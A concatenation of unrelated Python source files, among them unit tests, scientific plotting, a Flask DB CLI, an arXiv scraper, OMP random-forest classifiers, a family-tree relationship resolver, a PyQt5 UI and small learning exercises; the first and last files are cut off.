self.assertEqual(self.pv_panel.solar_irradiance, SOLAR_IRRADIANCE, "solar_irradiance is not equal")
self.assertEqual(self.pv_panel.heating_contribution, HEATING_CONTRIBUTION, "heating_contribution is not equal")
self.assertEqual(self.pv_panel.active, ACTIVE, "active is not equal")
class TestWaterTank(unittest.TestCase):
"""Tests for water tank"""
def setUp(self):
self.water_tank = agent.WaterTank.from_properties(capacity=CAPACITY, temp=TEMP,
active=ACTIVE)
def test_water_tank_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.water_tank.capacity, CAPACITY, "capacity is not equal")
self.assertEqual(self.water_tank.temp, TEMP, "temp is not equal")
self.assertEqual(self.water_tank.active, ACTIVE, "active is not equal")
class TestWindGenerator(unittest.TestCase):
"""Tests for wind generator"""
def setUp(self):
self.wind_generator = agent.WindGenerator.from_properties(power_coefficient=POWER_COEFFICIENT,
air_density=AIR_DENSITY, area=AREA, wind_speed=WIND_SPEED,
battery_coupling_efficiency=BATTERY_COUPLING_EFFICIENCY,
active=ACTIVE)
def test_wind_generator_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.wind_generator.power_coefficient, POWER_COEFFICIENT, "power_coefficient is not equal")
self.assertEqual(self.wind_generator.air_density, AIR_DENSITY, "air_density is not equal")
self.assertEqual(self.wind_generator.area, AREA, "area is not equal")
self.assertEqual(self.wind_generator.wind_speed, WIND_SPEED, "wind_speed is not equal")
self.assertEqual(self.wind_generator.active, ACTIVE, "active is not equal")
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import solver
mu = -0.8645
def homoclinic (S, t):
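# Vector field of the homoclinic normal form: x' = y, y' = mu*y + x - x**2 + x*y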
x, y = S
return (np.array([y,
mu * y + x - np.square(x) + x * y]))
def numInt (Ttrans, Teval, dt, X0):
s = solver.ODE_Solver()
time, sol = s.solveODE(homoclinic, X0, Ttrans, Teval, dt, 1,
"explicitRungeKutta4")
X = sol[0, :]
Y = sol[1, :]
return (time, X, Y)
def plotTimeSeries ():
myfontsize = 20.0
dt = 1e-2
Ttrans1 = 0.0
Teval1 = 8.0
X0_1 = [0.0, 1.0]
Ttrans2 = 0.0
Teval2 = 47.0
X0_2 = [0.3263, 0.0]
global mu
time1, X1, Y1 = numInt(Ttrans1, Teval1, dt, X0_1)
time2, X2, Y2 = numInt(Ttrans2, Teval2, dt, X0_2)
'''
fig, ax = plt.subplots()
fig.set_size_inches(5.9, 5.9)
# ~ ax.set_aspect(4.4 / 3.4)
plt.subplots_adjust(top=0.99, bottom=0.13, left=0.15, right=0.99)
plt.plot(time2, X2, color="red", label=r"$x(t)$")
plt.plot(time2, Y2, color="blue", label=r"$y(t)$")
plt.text(21.5, -0.13, r"$\mu=$" + str(mu), fontsize=20, bbox={"facecolor":"white", "edgecolor":"none", "alpha":0.95})
plt.xlabel(r"time $t$", fontsize=myfontsize)
plt.xticks([0.0, 10.0, 20.0, 30.0], fontsize=myfontsize)
plt.yticks([-0.5, 0.0, 0.5, 1.0, 1.5], fontsize=myfontsize)
plt.legend(fancybox=True, framealpha=1.0, loc="lower right", fontsize=myfontsize)
plt.grid(color="lightgray")
'''
fig, ax = plt.subplots()
fig.set_size_inches(5.9, 5.9)
ax.set_aspect(1)
plt.subplots_adjust(top=0.99, bottom=0.13, left=0.15, right=1.00)
y, x = np.mgrid[-2.5:2.5:75j, -2.5:2.5:75j]
u = y
v = mu * y + x - np.square(x) + x * y
plt.streamplot(x, y, u, v, color="lightgray")
plt.plot(X1, Y1, color="black", linestyle="--")
plt.plot(X1[0], Y1[0], color="gray", marker="o", markersize=8)
plt.plot(X2, Y2, color="black")
plt.plot(X2[0], Y2[0], color="gray", marker="o", markersize=8)
plt.xlim(-2.2, 2.2)
plt.ylim(-2.2, 2.2)
plt.text(-0.69, 1.55, r"$\mu=$" + str(mu), fontsize=myfontsize, bbox={"facecolor":"white", "edgecolor":"none", "alpha":0.95})
plt.xlabel(r"$x$", fontsize=myfontsize)
plt.ylabel(r"$y$", fontsize=myfontsize)
plt.xticks([-2.0, -1.0, 0.0, 1.0, 2.0], fontsize=myfontsize)
plt.yticks([-2.0, -1.0, 0.0, 1.0, 2.0], fontsize=myfontsize)
plt.grid(color="lightgray")
plt.show()
def plotSNIPERbifurcationDiagram ():
myfontsize = 18.0
Ttrans = 100.0
Teval = 100.0
dt = 1e-2
X0 = [0.0, 1e-3]
nSteps = int(Teval / dt)
bList = np.arange(0.025, 2.0 + 1e-5, 0.025)
X = np.zeros((nSteps, bList.size))
Y = np.zeros((nSteps, bList.size))
i = 0
global mu  # assuming the sweep should drive mu, the only parameter homoclinic() reads (the original assigned an unused name b)
for B in bList:
mu = B
time, x, y = numInt(Ttrans, Teval, dt, X0)
X[:, i] = x
Y[:, i] = y
i += 1
print(i, " of ", bList.size, " simulations")
one = np.ones(X[:, 0].shape)
fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
fig.set_size_inches(5.9, 4.8)
plt.rcParams.update({"font.size": myfontsize})
plt.subplots_adjust(top=1.05, bottom=0.13, left=0.01, right=0.99)
for i in np.arange(bList.size):
ax.scatter(bList[i] * one, X[:, i], Y[:, i], color="black", s=0.1)
ax.view_init(elev=30.0, azim=-120.0)
ax.zaxis.set_rotate_label(False)
ax.set_xlabel(r"bifurcation parameter $b$", fontsize=myfontsize)
ax.set_ylabel(r"$x$", fontsize=myfontsize)
ax.set_zlabel(r"$y$", fontsize=myfontsize, rotation=90.0)
ax.set_xlim(-0.1, 2.1)
ax.xaxis.set_tick_params(labelsize=myfontsize)
ax.yaxis.set_tick_params(labelsize=myfontsize)
ax.zaxis.set_tick_params(labelsize=myfontsize)
ax.xaxis.labelpad=18 #19
ax.yaxis.labelpad=9 #15
ax.zaxis.labelpad=4 #7
ax.set_xticks([0.0, 1.0, 2.0])
ax.set_yticks([-1.0, 0.0, 1.0])
ax.set_zticks([-1.0, 0.0, 1.0])
plt.show()
plotTimeSeries()
# ~ plotSNIPERbifurcationDiagram()
|
import click
import time
from flask.cli import AppGroup
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
db_cli = AppGroup('db')
# TODO: Add support for schema migrations
@db_cli.command('init')
def init_db():
"""
Create schema
"""
db.create_all()
@db_cli.command('wait')
def wait_db():
"""
Wait database to be available during 30 seconds
"""
retries = 30
for i in range(retries):
try:
db.session.execute('SELECT 1')
return
except Exception as e:
if i >= retries-1:
raise e
time.sleep(1)
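# Illustrative wiring sketch (create_app is a hypothetical Flask app factory):
# app = create_app()
# db.init_app(app)
# app.cli.add_command(db_cli)  # exposes `flask db init` and `flask db wait`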
|
# PART 1
# For the exercise in the first chapter, use the following:
# import random
# numero = random.randint(0, 100)
# For the second chapter, use the following:
print("Enter the number to guess")
while True:
# We enter an infinite loop
# Ask the user for a number
numero = input("Enter a number between 0 and 99 inclusive: ")
try:
numero = int(numero)
except ValueError:  # reject non-numeric input and ask again
pass
else:
# Do the comparison
if 0 <= numero <= 99:
# We have what we want; exit the loop
break
# PART 2
print("Try to find the number to guess")
while True: # LOOP 1
# We enter an infinite loop
# that lets us play several rounds
while True: # LOOP 2
# We enter an infinite loop
# that lets us correct a typing mistake
# Ask the user for a number
intento = input("Enter a number between 0 and 99 inclusive: ")
try:
intento = int(intento)
except ValueError:  # reject non-numeric input and ask again
pass
else:
# Do the comparison
if 0 <= intento <= 99:
# We have what we want; exit LOOP 2
break
# Test whether the guess is correct
if intento < numero:
print("Too small")
elif intento > numero:
print("Too big")
else:
print("Victory!")
# The game is over; exit LOOP 1
break
|
import sys
import smtplib
import requests
import bs4
import os
import re
import json
from email.mime.text import MIMEText
# adjust this path to your setup
with open('/Users/axellaborieux/watchArxiv_perso/watchAuthors.json', 'r') as f:
args = json.loads(f.read())
old_total = args['total']
names = args['names']
surnames = args['surnames']
if sys.argv[1]=='add':
names.append(sys.argv[3])
surnames.append(sys.argv[2])
elif sys.argv[1]=='remove':
names.remove(sys.argv[3])
surnames.remove(sys.argv[2])
else:
print('something is not right, exiting!')
exit()
link = "https://arxiv.org/search/advanced?advanced="
for idx, (name, surname) in enumerate(zip(names, surnames)):
link += "&terms-"+str(idx)+"-operator=OR&terms-"+str(idx)+"-term="+name+"%2C+"+surname+"&terms-"+str(idx)+"-field=author"
link += "&classification-physics_archives=all&classification-include_cross_list=include&date-filter_by=all_dates&date-year=2021&date-from_date=&date-to_date=&date-date_type=submitted_date&abstracts=show&size=100&order=-announced_date_first"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
res = requests.get(link, headers=headers)
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, features="html.parser")
results = soup.select('li.arxiv-result')
new_total = soup.select('h1.title')[0].getText().strip()
new_total = new_total.split(' ')
new_total = int(new_total[3].replace(',', ''))
with open('/Users/axellaborieux/watchArxiv_perso/watchAuthors.json', 'w') as json_file:
new = {'total': new_total,
'names': names,
'surnames': surnames}
json.dump(new, json_file, indent=4)
print('Successfully updated total from {} to {}!'.format(old_total, new_total))
|
from bolsonaro.models.omp_forest import OmpForest, SingleOmpForest
from bolsonaro.utils import binarize_class_data, omp_premature_warning
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import OrthogonalMatchingPursuit
import warnings
class OmpForestBinaryClassifier(SingleOmpForest):
DEFAULT_SCORE_METRIC = 'indicator'
def __init__(self, models_parameters):
estimator = RandomForestClassifier(**models_parameters.hyperparameters,
random_state=models_parameters.seed, n_jobs=-1)
super().__init__(models_parameters, estimator)
def _check_classes(self, y):
assert len(set(y).difference({-1, 1})) == 0, "Classes for binary classifier must be {-1, +1}"
def fit(self, X_forest, y_forest, X_omp, y_omp, use_distillation=False):
self._check_classes(y_forest)
self._check_classes(y_omp)
return super().fit(X_forest, y_forest, X_omp, y_omp, use_distillation=use_distillation)
def _base_estimator_predictions(self, X):
predictions_0_1 = super()._base_estimator_predictions(X)
predictions = (predictions_0_1 - 0.5) * 2
return predictions
def score_base_estimator(self, X, y):
predictions = self._base_estimator_predictions(X)
evaluation = np.sum(np.sign(np.mean(predictions, axis=1)) == y) / len(y)
return evaluation
def predict_no_weights(self, X):
"""
Apply the SingleOmpForest to X without using the weights.
Make all the base tree predictions
:param X: a Forest
:return: a np.array of the predictions of the entire forest
"""
forest_predictions = self._base_estimator_predictions(X)
weights = self._omp.coef_
omp_trees_predictions = forest_predictions[:, weights != 0]
# Here forest_pred is the probability of being class 1.
result_omp = np.mean(omp_trees_predictions, axis=1)
return result_omp
def score(self, X, y, metric=DEFAULT_SCORE_METRIC):
"""
Evaluate OMPForestClassifer on (`X`, `y`) using `metric`
:param X:
:param y:
:param metric: might be "indicator"
:return:
"""
predictions = self.predict(X)
if metric == 'indicator':
evaluation = np.abs(np.mean(np.abs(np.sign(predictions) - y) - 1))
else:
raise ValueError("Unsupported metric '{}'.".format(metric))
return evaluation
class OmpForestMulticlassClassifier(OmpForest):
DEFAULT_SCORE_METRIC = 'indicator'
def __init__(self, models_parameters):
estimator = RandomForestClassifier(**models_parameters.hyperparameters,
random_state=models_parameters.seed, n_jobs=-1)
super().__init__(models_parameters, estimator)
# question: maybe initialize the OMPs in __init__, as is done for SingleOmpForest?
self._dct_class_omp = {}
def fit_omp(self, atoms, objective):
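# One-vs-rest strategy: for each class, binarize the atoms and targets to
# {-1, +1} and fit a separate OMP that selects a sparse subset of trees.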
assert len(self._dct_class_omp) == 0, "fit_omp can be called only once on {}".format(self.__class__.__name__)
possible_classes = sorted(set(objective))
for class_label in possible_classes:
atoms_binary = binarize_class_data(atoms, class_label, inplace=False)
objective_binary = binarize_class_data(objective, class_label, inplace=False)
# TODO: maybe treat the forest size as global, so that only a fraction of it is available to each OMP...
omp_class = OrthogonalMatchingPursuit(
n_nonzero_coefs=self.models_parameters.extracted_forest_size,
fit_intercept=True, normalize=False)
with warnings.catch_warnings(record=True) as caught_warnings:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
omp_class.fit(atoms_binary, objective_binary)
# ignore any non-custom warnings that may be in the list
caught_warnings = list(filter(lambda i: i.message != RuntimeWarning(omp_premature_warning), caught_warnings))
if len(caught_warnings) > 0:
self._logger.error(f'number of linear dependences in the dictionary: {len(caught_warnings)}. model parameters: {str(self._models_parameters.__dict__)}')
self._dct_class_omp[class_label] = omp_class
return self._dct_class_omp
def predict(self, X):
'''forest_predictions = self._base_estimator_predictions(X)
print(forest_predictions.shape)
if self._models_parameters.normalize_D:
forest_predictions /= self._forest_norms
label_names = []
preds = []
for class_label, omp_class in self._dct_class_omp.items():
label_names.append(class_label)
atoms_binary = binarize_class_data(forest_predictions, class_label, inplace=False)
print(atoms_binary.shape)
preds.append(self._make_omp_weighted_prediction(atoms_binary, omp_class, self._models_parameters.normalize_weights))
# TODO: check that this is not buggy here
preds = np.array(preds).T'''
forest_predictions = np.array([tree.predict_proba(X) for tree in self._base_forest_estimator.estimators_]).T
if self._models_parameters.normalize_D:
forest_predictions /= self._forest_norms
label_names = []
preds = []
num_class = 0
for class_label, omp_class in self._dct_class_omp.items():
label_names.append(class_label)
atoms_binary = (forest_predictions[num_class] - 0.5) * 2 # rescale probabilities from 0/1 to -1/+1
preds.append(self._make_omp_weighted_prediction(atoms_binary, omp_class, self._models_parameters.normalize_weights))
num_class += 1
preds = np.array(preds).T
max_preds = np.argmax(preds, axis=1)
return np.array(label_names)[max_preds]
def predict_no_weights(self, X):
"""
Apply the SingleOmpForest to X without using the weights.
Make all the base tree predictions
:param X: a Forest
:return: a np.array of the predictions of the entire forest
"""
forest_predictions = np.array([tree.predict_proba(X) for tree in self._base_forest_estimator.estimators_]).T
if self._models_parameters.normalize_D:
forest_predictions = forest_predictions.T
forest_predictions /= self._forest_norms
forest_predictions = forest_predictions.T
label_names = []
preds = []
num_class = 0
for class_label, omp_class in self._dct_class_omp.items():
weights = omp_class.coef_
omp_trees_indices = np.nonzero(weights)[0]  # 1-D index array, so len() below counts the selected trees (np.nonzero alone returns a tuple)
label_names.append(class_label)
atoms_binary = (forest_predictions[num_class].T - 0.5) * 2 # rescale probabilities from 0/1 to -1/+1
preds.append(np.sum(atoms_binary[omp_trees_indices], axis=0)/len(omp_trees_indices))
num_class += 1
preds = np.array(preds).T
max_preds = np.argmax(preds, axis=1)
return np.array(label_names)[max_preds]
def score(self, X, y, metric=DEFAULT_SCORE_METRIC):
predictions = self.predict(X)
if metric == 'indicator':
evaluation = np.sum(np.ones_like(predictions)[predictions == y]) / X.shape[0]
else:
raise ValueError("Unsupported metric '{}'.".format(metric))
return evaluation
@staticmethod
def _make_omp_weighted_prediction(base_predictions, omp_obj, normalize_weights=False):
if normalize_weights:
# we can normalize weights (by their sum) so that they sum to 1
# and they can be interpreted as impact percentages for interpretability.
# this requires removing the (-) sign from the weights, e.g. moving it into the predictions (use unsigned_coef) --> I don't see why
# question: I don't understand the trick with nonzero?
# predictions = self._omp.predict(forest_predictions) * (1 / (np.sum(self._omp.coef_) / len(np.nonzero(self._omp.coef_))))
coef_signs = np.sign(omp_obj.coef_)[np.newaxis, :] # add axis to make sure it will be broadcasted line-wise (there might be a confusion when forest_prediction is square)
unsigned_coef = (coef_signs * omp_obj.coef_).squeeze()
intercept = omp_obj.intercept_
adjusted_forest_predictions = base_predictions * coef_signs
predictions = adjusted_forest_predictions.dot(unsigned_coef) + intercept
else:
predictions = omp_obj.predict(base_predictions)
return predictions
if __name__ == "__main__":
forest = RandomForestClassifier(n_estimators=10)
X = np.random.rand(10, 5)
y = np.random.choice([-1, +1], 10)
forest.fit(X, y)
print(forest.predict(np.random.rand(10, 5)))
|
import re
from .tree import Tree
from .tree_node import TreeNode
SON = "Son"
DAUGHTER = "Daughter"
SIBLINGS = "Siblings"
PATERNAL = "Paternal"
MATERNAL = "Maternal"
UNCLE = "Uncle"
AUNT = "Aunt"
BROTHER = "Brother"
SISTER = "Sister"
IN_LAW = "In-Law"
class RelationshipTree(Tree):
"""
Family tree that supports finding relationships between tree nodes.
"""
def __init__(self, root_name, root_gender) -> None:
super().__init__(root_name, root_gender)
def get_direct_relation(self, node: "TreeNode", relationship: str):
if relationship == SON:
return node.get_children(TreeNode.GENDER_MALE)
if relationship == DAUGHTER:
return node.get_children(TreeNode.GENDER_FEMALE)
if relationship == SIBLINGS:
return node.get_siblings()
def get_parent_relation(self, node: "TreeNode", relationship: str):
result = []
parent = node.get_father()
if MATERNAL in relationship:
parent = node.get_mother()
gender = TreeNode.GENDER_MALE
if AUNT in relationship:
gender = TreeNode.GENDER_FEMALE
if parent:
result = parent.get_siblings(gender)
return result
def get_in_laws(self, node: "TreeNode", relationship: str):
result = []
spouse = node.spouse()
gender = TreeNode.GENDER_MALE
if re.search(SISTER, relationship):
gender = TreeNode.GENDER_FEMALE
if spouse:
result += spouse.get_siblings(gender)
siblings = node.get_siblings()
result += [
sibling.spouse() for sibling in siblings if not sibling.is_gender(gender)
]
return result
def get_relationship(self, name: str, relationship: str):
"""
Get related node name
"""
node = self.find_node(name)
result = []
if not node:
return "PERSON_NOT_FOUND"
if relationship in [SON, DAUGHTER, SIBLINGS]:
result = self.get_direct_relation(node, relationship)
if re.search(f"{UNCLE}|{AUNT}", relationship):
result = self.get_parent_relation(node, relationship)
if re.search(IN_LAW, relationship):
result = self.get_in_laws(node, relationship)
if not result:
return "NONE"
return " ".join([node.get_name() for node in result if node])
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'L4_gui.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(513, 160)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 3, 0, 1, 1)
self.jsonTB = QtWidgets.QToolButton(self.centralwidget)
self.jsonTB.setObjectName("jsonTB")
self.gridLayout.addWidget(self.jsonTB, 0, 3, 1, 1)
self.linearOutLE = QtWidgets.QLineEdit(self.centralwidget)
self.linearOutLE.setObjectName("linearOutLE")
self.gridLayout.addWidget(self.linearOutLE, 2, 2, 1, 1)
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 2, 0, 1, 1)
self.jsonLE = QtWidgets.QLineEdit(self.centralwidget)
self.jsonLE.setObjectName("jsonLE")
self.gridLayout.addWidget(self.jsonLE, 0, 2, 1, 1)
self.arealOutTB = QtWidgets.QToolButton(self.centralwidget)
self.arealOutTB.setObjectName("arealOutTB")
self.gridLayout.addWidget(self.arealOutTB, 3, 3, 1, 1)
self.arealOutLE = QtWidgets.QLineEdit(self.centralwidget)
self.arealOutLE.setObjectName("arealOutLE")
self.gridLayout.addWidget(self.arealOutLE, 3, 2, 1, 1)
self.linearOutTB = QtWidgets.QToolButton(self.centralwidget)
self.linearOutTB.setObjectName("linearOutTB")
self.gridLayout.addWidget(self.linearOutTB, 2, 3, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.StartPB = QtWidgets.QPushButton(self.centralwidget)
self.StartPB.setObjectName("StartPB")
self.gridLayout.addWidget(self.StartPB, 4, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_3.setText(_translate("MainWindow", "Areal output name:"))
self.jsonTB.setText(_translate("MainWindow", "..."))
self.label_2.setText(_translate("MainWindow", "Linear output name:"))
self.arealOutTB.setText(_translate("MainWindow", "..."))
self.linearOutTB.setText(_translate("MainWindow", "..."))
self.label.setText(_translate("MainWindow", "Input JSON file:"))
self.StartPB.setText(_translate("MainWindow", "Start"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
def rev(n):
return int(str(n)[::-1])
def check_pallindrome(n):
return n == rev(n)
def res(n):
reverse = rev(n)
n += reverse
return n if check_pallindrome(n) else res(n)
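# Note: for suspected Lychrel numbers such as 196 this recursion never reaches
# a palindrome and will exhaust Python's recursion limit.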
if __name__ == '__main__':
n = int(input())
print(res(n))
'''Compute the palindrome number reached from a given number by repeatedly adding its reverse.
Input:
1. 195
2. 4
Output:
1. 9339
2. 8 '''
|
## 1) Ask the user to enter a type of cuisine among 'Korean', 'Italian', and 'Japanese'.
## 2) Recommend a dish at random.
import secrets
# PROBLEM : How to continue the loop until a user enters a correct value?!
def recommend_cuisine():
try:
korean_food = ['Bibimbap', 'Kimbap', 'Galbi']
italian_food = ['Lasagne', 'Italian Pizza', 'Pasta e fagioli']
japanese_food = ['Sushi', 'Udon', 'Tempura']
choice = input("What kinds of cuisines would you like to eat? (Enter 'Korean' or 'Italian' or 'Japanese') ")
if choice == 'Korean' or choice == 'korean':
result = secrets.choice(korean_food)
elif choice == 'Italian' or choice == 'italian':
result = secrets.choice(italian_food)
elif choice == 'Japanese' or choice == 'japanese':
result = secrets.choice(japanese_food)
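# If none of the branches matched, `result` is unbound and the check below
# raises NameError, which the bare except turns into a retry (see PROBLEM above).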
if result:
print(f'I would like to recommend a {choice} food called "{result}". I hope you enjoy the food!')
except:
print("Please enter among 'Korean' or 'Italian' or 'Japanese' !!!!!")
recommend_cuisine()
recommend_cuisine()
# https://stackoverflow.com/questions/23294658/asking-the-user-for-input-until-they-give-a-valid-response/23294659#23294659
|
from dotenv import load_dotenv, find_dotenv
import os
from sqlalchemy import create_engine, update
load_dotenv(find_dotenv())
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#Connect to MySQL
engine = create_engine("mysql+pymysql://"
+os.environ.get("mysql_user")
+":"+os.environ.get("mysql_password")
+"@"+os.environ.get("mysql_host")
+"/"+os.environ.get("mysql_database")+"?charset=utf8mb4")
conn = engine.connect()
me = "fbid:1529367683"
groupchat_threads = conn.execute("select thread_id from facebook_threads where num_participants > 2").fetchall()
groupchat_threads = [x[0] for x in groupchat_threads]
groupchat_threads = ','.join(groupchat_threads)
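# comma-separated id list, embedded in the SQL IN (...) clauses below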
sql_base="select timestamp from facebook_messages where"
sql_addon=""
sql_addon+=" and timestamp > 1356998400"
res_sent = conn.execute(sql_base+" sender_id = '"+me+"' and thread_id not in ("+groupchat_threads+")"+sql_addon).fetchall()
res_recv = conn.execute(sql_base+" sender_id != '"+me+"' and thread_id not in ("+groupchat_threads+")"+sql_addon).fetchall()
res_sent_groupchat = conn.execute(sql_base+" sender_id = '"+me+"' and thread_id in ("+groupchat_threads+")"+sql_addon).fetchall()
res_recv_groupchat = conn.execute(sql_base+" sender_id != '"+me+"' and thread_id in ("+groupchat_threads+")"+sql_addon).fetchall()
sadboyz = conn.execute(sql_base+" thread_id = '869042309831501'"+sql_addon).fetchall()
#build a numpy array of integers from the sql strings, then convert to datetime
column_sent = np.array([int(x[0]) for x in res_sent]).astype('datetime64[s]')
column_recv = np.array([int(x[0]) for x in res_recv]).astype('datetime64[s]')
column_sent_groupchat = np.array([int(x[0]) for x in res_sent_groupchat]).astype('datetime64[s]')
column_recv_groupchat = np.array([int(x[0]) for x in res_recv_groupchat]).astype('datetime64[s]')
sadboyz = np.array([int(x[0]) for x in sadboyz]).astype('datetime64[s]')
#dataframe for counting sent, solo
df = pd.DataFrame({'ts': column_sent})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_sent_count = df.groupby(by=['year', 'month']).count()#.plot(kind="bar")
df_sent_count.columns = ['#sent: 1 person chat']
#dataframe for counting received, solo
df = pd.DataFrame({'ts': column_recv})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_recv_count = df.groupby(by=['year', 'month']).count()
df_recv_count.columns = ['#received: 1 person chat']
#dataframe for counting sent, groupchat
df = pd.DataFrame({'ts': column_sent_groupchat})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_sent_count_groupchat = df.groupby(by=['year', 'month']).count()
df_sent_count_groupchat.columns = ['#sent: groupchat']
#dataframe for counting received, groupchat
df = pd.DataFrame({'ts': column_recv_groupchat})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_recv_count_groupchat = df.groupby(by=['year', 'month']).count()
df_recv_count_groupchat.columns = ['#received: groupchat']
#dataframe for counting sadboyz
df = pd.DataFrame({'ts': sadboyz})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df['day'] = df['ts'].dt.day
sadboyz = df.groupby(by=['year','month', 'day']).count()
sadboyz.columns = ['sadboyz messages']
ax = sadboyz.plot(kind="bar")
ax.get_figure().autofmt_xdate() # autofmt_xdate lives on the Figure, not on the DataFrame
#overlay the two charts
# merged = pd.concat([df_sent_count,df_recv_count,df_recv_count_groupchat,df_sent_count_groupchat],axis=1)
# merged.plot(kind="bar")
plt.show()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os.path
base_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(base_path)
os.chdir(base_path)
import json # noqa: E402
import sys # noqa: E402
import traceback # noqa: E402
from rucio.client import Client # noqa: E402
from rucio.common.exception import Duplicate # noqa: E402
UNKNOWN = 3
CRITICAL = 2
WARNING = 1
OK = 0
def main(argv):
# parameters
if argv:
rse_repo_file = argv[0]
else:
rse_repo_file = 'etc/rse_repository.json'
with open(rse_repo_file) as json_data:
repo_data = json.load(json_data)
c = Client()
for rse in repo_data:
try:
deterministic = repo_data[rse].get('deterministic', True)
volatile = repo_data[rse].get('volatile', False)
region_code = repo_data[rse].get('region_code')
country_name = repo_data[rse].get('country_name')
staging_area = repo_data[rse].get('staging_area')
continent = repo_data[rse].get('continent')
time_zone = repo_data[rse].get('time_zone')
ISP = repo_data[rse].get('ISP')
c.add_rse(rse, deterministic=deterministic, volatile=volatile,
region_code=region_code, country_name=country_name, staging_area=staging_area,
continent=continent, time_zone=time_zone, ISP=ISP)
except Duplicate:
print('%(rse)s already added' % locals())
except:
errno, errstr = sys.exc_info()[:2]
trcbck = traceback.format_exc()
print('Interrupted processing with %s %s %s.' % (errno, errstr, trcbck))
for p_id in repo_data[rse]['protocols']['supported']:
try:
p = repo_data[rse]['protocols']['supported'][p_id]
p['scheme'] = p_id
c.add_protocol(rse, p)
except ValueError as e:
print(rse, e)
except Duplicate as e:
print(rse, e)
except Exception:
errno, errstr = sys.exc_info()[:2]
trcbck = traceback.format_exc()
print('Interrupted processing for %s with %s %s %s.' % (rse, errno, errstr, trcbck))
if __name__ == '__main__':
main(sys.argv[1:])
|
# -*- coding: utf-8 -*-
import numpy as np
def is_empty(val):
return np.isnan(val) if isinstance(val, float) else not val
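# e.g. is_empty(float("nan")) -> True; is_empty("") -> True; is_empty(0.0) -> False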
|
import os
from io import BytesIO
from urllib.request import urlopen
from django.conf import settings
from django.test import LiveServerTestCase, Client
class Exercise3Test(LiveServerTestCase):
def test_media_example_upload(self):
"""
Test the upload functionality to the media_example view. Check it can be downloaded again.
"""
test_data = b'some test data'
filename = 'exercise_3_test.txt'
save_path = os.path.join(settings.MEDIA_ROOT, filename)
fp = BytesIO(test_data)
fp.name = filename
try:
c = Client()
resp = c.post('/media-example/', {'file_upload': fp})
self.assertEqual(resp.status_code, 200)
with open(save_path, 'rb') as uploaded_fp:
self.assertEqual(uploaded_fp.read(), test_data)
media_file = urlopen(self.live_server_url + '/media/' + filename)
self.assertEqual(media_file.read(), test_data)
finally:
if os.path.exists(save_path):
os.unlink(save_path)
|
import socket
import sys
command = sys.argv[1]
s = socket.socket()
host = socket.gethostname()
port = 12345
s.connect((host, port))
s.send(command.encode())
s.close()
|
import os
import sys
import traceback
import logging
def log_exception(level):
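"""Log the active exception's traceback at the given level, emitting a 'File ..., line ..., in ...' record plus the source line for each frame."""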
exc_type, exc_value, exc_traceback = sys.exc_info()
for i in traceback.extract_tb(exc_traceback):
# line = (os.path.basename(i[0]), i[1], i[2])
line = (i[0], i[1], i[2])
logging.log(level, 'File "%s", line %d, in %s' % line)
logging.log(level, '\t%s' % i[3])
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import hashlib
from os import remove, makedirs
from os.path import exists, isdir
from functools import partial
from types import FunctionType
import inspect
from ._decorator import experimental
def resolve_key(obj, key):
"""Resolve key given an object and key."""
if callable(key):
return key(obj)
elif hasattr(obj, 'metadata'):
